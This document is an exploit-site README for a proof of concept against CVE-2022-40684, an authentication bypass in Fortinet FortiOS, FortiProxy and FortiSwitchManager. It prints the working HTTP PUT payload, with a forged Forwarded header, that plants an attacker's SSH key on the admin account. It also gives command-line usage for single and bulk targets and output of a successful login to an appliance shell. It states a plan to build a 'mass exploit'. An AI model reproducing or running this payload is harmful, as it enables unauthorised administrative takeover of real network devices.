## https://sploitus.com/exploit?id=BD07E529-B3E2-5CB8-ACD4-AD7DAD69AFBD
# CVE-2022-40684 by 1vere$k
For now it's a POC copy for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances.
Coppied from https://github.com/horizon3ai/CVE-2022-40684
## Analysis
The exploit uses the simple payload:
```
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Content-Length: 610
{
"ssh-public-key1": "fake-key"
}
```
## Summary
This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.
## Future Plans
Develop it for a full scale exploit with multi-targets and multi-servers for mass exploit.
## CLI Usage
```
1. chmod +x cve-2022-40684.sh
2. ./cve-2022-40684 <TARGET_IP>
or
2. ./cve-2022-40684 <FILE_NAME>
```
Example:
`./cve-2022-40684.sh ips.txt`
## PyUsage
`python3 CVE-2022-40684.py -t <TARGET_IP> --username admin --key-file ~/.ssh/id_rsa.pub`
The example:
```
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh admin@10.0.40.67
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
```